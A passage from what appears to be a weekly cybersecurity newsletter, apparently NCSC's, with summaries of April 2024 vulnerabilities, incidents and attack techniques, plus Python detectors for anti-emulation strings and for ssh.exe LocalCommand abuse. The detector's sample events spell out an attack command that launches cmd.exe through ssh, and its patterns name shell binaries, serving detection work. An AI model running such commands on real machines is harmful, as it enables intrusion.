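    for path, reasons in hunt(SAMPLE_PLISTS).items():
        print(path, reasons)
```

A compiled .scpt hides its source language, so the second hit is flagged for review rather than identified as JXA; on a live host, decompile it with osadecompile before deciding. Run hunt(load_from_disk()) to cover the real directories.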
Unveiling malware behavior trends
Samir Bousseaden provides an analysis of a Windows dataset of over 100,000 malicious files. Some good hard data on the possible choke points..
https://www.elastic.co/security-labs/unveiling-malware-behavior-trends
Opening EXPMON for Everyone
Haifei provides the platform and their methodology in this release..
The core idea of EXPMON is that it runs the sandboxes based on a concept we call "environment binding." This is because exploits run very differently than malware. Exploits are highly dependent on the specific software environment; we can't examine exploits without considering the environment. For example, a .pdf exploit for Foxit Reader may not function as a working exploit on Adobe Reader. If you use a sandboxing environment with Adobe Reader to test the .pdf sample, you will miss out on the exploit. Sometimes, an exploit may target specific software versions and act normally on others.
https://justhaifei1.blogspot.com/2024/04/opening-expmon-for-everyone.html
https://pub.expmon.com/static/pdf/expmon_methodology_architecture.pdf
Defence
How we proactively defend our environments.
KB5025885: How to manage the Windows Boot Manager revocations for Secure Boot changes associated with CVE-2023-24932
Complex patch this..
IMPORTANT You should apply the Windows security update released on or after April 9, 2024, as part of your regular monthly update process.
This article applies to those organizations who should begin evaluating mitigations for a publicly disclosed Secure Boot bypass leveraged by the BlackLotus UEFI bootkit. Additionally, you might want to take a proactive security stance or to start to prepare for the rollout. Note that this malware requires physical or administrative access to the device.
CAUTION After the mitigation for this issue is enabled on a device, meaning the mitigations have been applied, it cannot be reverted if you continue to use Secure Boot on that device. Even reformatting of the disk will not remove the revocations if they have already been applied. Please be aware of all the possible implications and test thoroughly before you apply the revocations that are outlined in this article to your device.
Fighting cookie theft using device bound sessions
Kristian Monsen outlines Google’s possible approach to dealing with stealers..
We’re prototyping a new web capability called Device Bound Session Credentials (DBSC) that will help keep users more secure against cookie theft. The project is being developed in the open at github.com/WICG/dbsc with the goal of becoming an open web standard.
By binding authentication sessions to the device, DBSC aims to disrupt the cookie theft industry since exfiltrating these cookies will no longer have any value. We think this will substantially reduce the success rate of cookie theft malware. Attackers would be forced to act locally on the device, which makes on-device detection and cleanup more effective, both for anti-virus software as well as for enterprise managed devices.
https://blog.chromium.org/2024/04/fighting-cookie-theft-using-device.html
Strategies to monitor and prevent vulnerable driver attacks
Stefan Puzderca provides the Microsoft DART guide to this problem..
From a threat hunting perspective, it is important to understand what data sources are available and what coverage they have. Baselining the driver activity in the environment can greatly reduce the number of false positives in the hunts. The challenges encountered when conducting threat hunting for vulnerable drivers include: their presence in various legitimate locations, their potential to possess file extensions other than .sys, and the fact that even vulnerable drivers can exhibit seemingly convincing metadata. The following questions can guide threat hunting in identifying the vulnerable drivers:
Do old signed drivers correspond to any required business application
When was the driver signed
Where is the driver located
What process installed the driver
Is the driver metadata normal for the environment
NSA Issues Guidance for Maturing Data Security
From our partners at Fort Meade.
The recommendations in the Cybersecurity Information Sheet (CSI), “Advancing Zero Trust Maturity Throughout the Data Pillar,” are intended to ensure only those with authorization can access data.
Incident Writeups & Disclosures
How they got in and what they did.
Compromise of Sisense Customer Data
From our partners at CISA.
CISA urges Sisense customers to:
Reset credentials and secrets potentially exposed to, or used to access, Sisense services.
Investigate—and report to CISA—any suspicious activity involving credentials potentially exposed to, or used to access, Sisense services.
https://www.cisa.gov/news-events/alerts/2024/04/11/compromise-sisense-customer-data
Vulnerability
Our attack surface.
InSpectre Gadget
VUSec is the Systems and Network Security Group at Vrije Universiteit Amsterdam and they have performed some excellent validation work here which found the original mitigations wanting!
We present InSpectre Gadget, an in-depth Spectre gadget inspector that uses symbolic execution to accurately reason about exploitability of usable gadgets. Our tool performs generic constraint analysis and models knowledge of advanced exploitation techniques to accurately reason over gadget exploitability in an automated way.
We show that our tool can not only uncover new (unconventionally) exploitable gadgets in the Linux kernel, but that those gadgets are sufficient to bypass all deployed Intel mitigations. As a demonstration, we present the first native Spectre-v2 exploit against the Linux kernel on last-generation Intel CPUs, based on the recent BHI variant and able to leak arbitrary kernel memory at 3.5 kB/sec.
https://www.vusec.net/projects/native-bhi/
Command Injection and Backdoor Account in D-Link NAS Devices
2024, yes..
The described vulnerability affects multiple D-Link NAS devices, including models DNS-340L, DNS-320L, DNS-327L, and DNS-325, among others. The vulnerability lies within the nas_sharing.cgi URI, which is vulnerable due to two main issues: a backdoor facilitated by hardcoded credentials, and a command injection vulnerability via the system parameter.
https://github.com/netsecfish/dlink
CVE-2023-3454: Remote code execution in Brocade Fabric OS
Network device security..
Remote code execution (RCE) vulnerability in Brocade Fabric OS after v9.0 and before v9.2.0 could allow a remote unauthenticated attacker to execute arbitrary code and use this to gain root access to the switch.
YSA-2024-01: YubiKey Manager Privilege Escalation
Vulnerabilities in security products..
A security issue has been identified in YubiKey Manager GUI which could lead to unexpected privilege escalation on Windows. If a user runs the YubiKey Manager GUI as Administrator, browser windows opened by YubiKey Manager GUI may be opened as Administrator which could be exploited by a local attacker to perform actions as Administrator. Under this circumstance, some browsers like Edge for example, have additional mitigations to prevent opening as Administrator.
https://www.yubico.com/support/security-advisories/ysa-2024-01/
Malicious Framework Vulnerabilities
Illegal to use in the wild..
CVE-2024-30850: Remote code execution on CHAOS RAT via agent spoofing
Evan Ikeda finds a vulnerability in an implant framework..
An authenticated command injection vulnerability that can be chained with an XSS to execute commands on the RAT server.
https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/
CVE-2024-30851 Jasmin ransomware web panel path traversal
Evan Ikeda finds another vulnerability in an implant framework..
A pre-auth path traversal vulnerability in the Jasmin Ransomware web panel (CVE-2024-30851), allowing an attacker to deanonymize panel operators and dump decryption keys. Jasmin ransomware was observed in a recent TeamCity (CVE-2024-27198, CVE-2024-27199) exploitation campaign
https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc
Offense
Attack capability, techniques and trade-craft.
Raspberry Robin and its new anti-emulation trick
Defender clearly imposing cost..
The anti-emulation technique spotted in Arkei was a string comparison between:
The computer name and “HAL9TH”
The username and “JohnDoe”
Indeed, in the “Windows Defender Emulator”, the Windows API function GetComputerName always returns HAL9TH and GetUsername the string JohnDoe.
https://harfanglab.io/en/insidethelab/raspberry-robin-and-its-new-anti-emulation-trick/
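Because the check is a plain string comparison against fixed values, the emulator's identity strings are often present in the sample, in the narrow form if the code compares against GetComputerNameA/GetUserNameA and in UTF-16LE if it uses the wide variants. The following is an added example, not HarfangLab's code, that scans a blob for both encodings of both markers and treats the presence of the pair as the stronger signal; the two "sections" are constructed and the assumption that the strings are stored unobfuscated is exactly the limitation a packed or stack-built sample would defeat.

```python
"""Hunt for Defender-emulator identity strings as an anti-emulation indicator (added example)."""
import re

# Identity values the Windows Defender emulator returns, per the write-up above.
EMULATOR_MARKERS = ("HAL9TH", "JohnDoe")


def marker_patterns(markers=EMULATOR_MARKERS):
    """Byte patterns for each marker in ASCII (narrow API) and UTF-16LE (wide API)."""
    patterns = {}
    for marker in markers:
        patterns[(marker, "ascii")] = re.compile(re.escape(marker.encode("ascii")))
        patterns[(marker, "utf-16le")] = re.compile(re.escape(marker.encode("utf-16-le")))
    return patterns


def find_emulator_markers(data, markers=EMULATOR_MARKERS):
    """Return {(marker, encoding): [offsets]} for every occurrence in `data`."""
    hits = {}
    for key, pattern in marker_patterns(markers).items():
        offsets = [m.start() for m in pattern.finditer(data)]
        if offsets:
            hits[key] = offsets
    return hits


def looks_emulation_aware(data, markers=EMULATOR_MARKERS):
    """True when every marker is present in at least one encoding."""
    found = {marker for (marker, _encoding) in find_emulator_markers(data, markers)}
    return found == set(markers)


# Constructed sample data, not real binaries: a benign blob and one carrying
# "HAL9TH" as a wide string (GetComputerNameW compare) and "JohnDoe" narrow.
BENIGN = b"MZ\x90\x00" + b"\x00" * 64 + b"Hello from a plain installer\x00"
SUSPECT = (
    b"MZ\x90\x00" + b"\x00" * 32
    + "HAL9TH".encode("utf-16-le") + b"\x00\x00"
    + b"JohnDoe\x00"
)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, find_emulator_markers(blob), looks_emulation_aware(blob))
```

Scanning only for the ASCII form misses the wide-string compare, which is the more common one in code that calls the W variants of the APIs; checking both, and requiring both markers, keeps the rule useful without firing on every binary that merely contains a common first name.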
Graphspy – The Swiss Army Knife For Attacking M365 & Entra
Keanu Nys releases a capability we can expect to be used by threat actors in 3..2..
Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI
https://insights.spotit.be/2024/04/05/graphspy-the-swiss-army-knife-for-attacking-m365-entra/
https://github.com/RedByte1337/GraphSpy
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access
Alex Reid provides evidence once more why Shortcut files coming into an organisation via any source are likely a bad idea..
LocalCommand
Specifies a command to execute on the local machine after successfully connecting to the server. The command string extends to the end of the line, and is executed with the user’s shell. The following escape character substitutions will be performed: ‘%d’ (local user’s home directory), ‘%h’ (remote host name), ‘%l’ (local host name), ‘%n’ (host name as provided on the command line), ‘%p’ (remote port), ‘%r’ (remote user name) or ‘%u’ (local user name). This directive is ignored unless PermitLocalCommand has been enabled.
..
With this option we can specify commands to be executed by a cmd.exe process that is spawned as a child of ssh.exe. Interestingly, ssh.exe is able to spawn cmd.exe and execute commands even when it has been disabled via GPO
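Two things in the description above are directly observable in endpoint telemetry: LocalCommand (and the PermitLocalCommand it depends on) passed as -o options on the ssh.exe command line, and ssh.exe appearing as the parent of cmd.exe. The following is an added example, not from the write-up, that runs those checks over constructed process-creation events (field names, the 203.0.113.10 host and the config path are assumptions); it also flags a -F config file loaded from outside a user's .ssh directory, since the same options can be smuggled in a config file instead of on the command line.

```python
"""Flag ssh.exe LocalCommand abuse in process-creation events (added example)."""
import re
from pathlib import PureWindowsPath

# ssh keywords are case-insensitive; both "-o Key=value" and "-oKey=value" are valid.
LOCALCOMMAND_RE = re.compile(r'-o\s*"?(?:PermitLocalCommand|LocalCommand)\b', re.IGNORECASE)
# -F is case-sensitive (-f means something else), so no IGNORECASE here.
CONFIG_FILE_RE = re.compile(r'\s-F\s*"?([^\s"]+)')
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed sample events in a Sysmon-style shape; not real telemetry.
EVENTS = [
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'ssh.exe -o PermitLocalCommand=yes -o "LocalCommand=cmd.exe /c calc.exe" user@203.0.113.10'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "command_line": "cmd.exe /c calc.exe"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "command_line": "ssh.exe deploy@build01"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"ssh.exe -F C:\Users\Public\evil_config build01"},
]


def classify(event):
    """Return the reasons an event is suspicious (empty list = nothing to see)."""
    reasons = []
    image = PureWindowsPath(event["image"]).name.lower()
    parent = PureWindowsPath(event["parent_image"]).name.lower()
    cmd = event["command_line"]

    if image == "ssh.exe":
        if LOCALCOMMAND_RE.search(cmd):
            reasons.append("LocalCommand option on ssh.exe command line")
        match = CONFIG_FILE_RE.search(cmd)
        if match and "\\.ssh\\" not in match.group(1).lower():
            reasons.append(f"ssh config loaded from outside .ssh: {match.group(1)}")

    # The child-process view catches the case where the option arrived via a config file.
    if parent == "ssh.exe" and image in SHELLS:
        reasons.append(f"{image} spawned by ssh.exe")
    return reasons


def detect(events):
    """Map the index of each flagged event to its reasons."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}


if __name__ == "__main__":
    for index, reasons in detect(EVENTS).items():
        print(index, EVENTS[index]["command_line"], "->", reasons)
```

The parent/child rule is the one to keep even if the command-line rules are tuned away: a legitimate ssh.exe session on a workstation has no reason to spawn cmd.exe, and the write-up notes that the spawn still happens when cmd.exe is supposedly disabled by GPO, so the policy is not the control you can rely on.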
Exploitation
What is being exploited.
CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway
Fridays..
Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability.
https://security.paloaltonetworks.com/CVE-2024-3400
CVE-2024-1086: Universal local privilege escalation on Linux
Lau provides a key I suspect we will see widely used..
Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.
https://github.com/Notselwyn/CVE-2024-1086
CVE-2024-3273: D-Link NAS RCE Exploited in the Wild
Matthew Remacle provides details of in-the-wild exploitation.
Upon further analysis, it appears the number of vulnerable devices is much lower than initially reported. According to our friends at Censys, the number is closer to 5,500 devices.
https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
Exploiting CVE-2024-21378 – Remote Code Execution in Microsoft Outlook
Rich Wolferd details a technique we can expect to be used by threat actors in 3..2..
In 2023 [we] discovered that Microsoft Outlook was vulnerable to authenticated remote code execution (RCE) via synced form objects. This blog will cover how we discovered CVE-2024-21378 and weaponized it by modifying Ruler, an Outlook penetration testing tool..
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
BOLT-based binary analysis tool to verify correctness of security hardening
Kristof Beyls makes a decent proposal to the llvm community, please support..
This RFC proposes building a static binary analyzer that can scan binaries to
verify that a given hardening feature has been applied correctly across the
whole binary. I’ve built a prototype on top of BOLT and propose to improve it
enough to be able to upstream it. I will need help to do so successfully.
Monocle
James Stevenson provides tooling which hints at real-world applications of LLMs in cyber security research..
Monocle is tooling backed by a large language model for performing natural language searches against compiled target binaries. Monocle can be provided with a binary and a search criteria (e.g., authentication code, vulnerable code, password strings, and more), and it will decompile the binary and use its in-built LLM to identify and score areas of the code that meet the criteria.
🔬 Binary Search: Without any prior knowledge, Monocle will support in answering binary analysis questions related to the target.
🤖 Natural Language and Open-Ended Questions: As Monocle is backed by an LLM queries passed to it are written in plain text.
🛠️ Ghidra Enabled: Monocle uses Ghidra headless to enable decompilation of compiled binaries!
https://github.com/user1342/Monocle
nimfilt
Marc-Etienne M.Léveillé and Alex provide this aid to reverse engineers..
A collection of modules and scripts to help with analyzing Nim binaries
https://github.com/eset/nimfilt
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
Demonstration of logical qubits and repeated error correction with better-than-physical error rates - “These results signify an important transition from noisy intermediate scale quantum computing to reliable quantum computing, and demonstrate advanced capabilities toward large-scale fault-tolerant quantum computing”
Bypassing Denuvo in Hogwarts Legacy - “The game collects hardware/software features into a fingerprint and generates a Steam Ticket (proof of game ownership).” - game hackers make really good vulnerability researchers.
Mobile Threat Intelligence Framework (MoTIF) Principles from the GSM Association
Artificial intelligence
Books
Nothing this week.
Events
2024 USCYBERCOM Legal Conference - videos available..
Programme du SSTIC 2024 - 5th to 7th June 2024 in France
Trusted Internet Summer School on Internet Governance and International Law - July 8-12, 2024 in Poland
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how we will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.
You've got a broken link on that China-Africa piece..it's just http://Q You trying to tell us something Ollie? Like who you really are?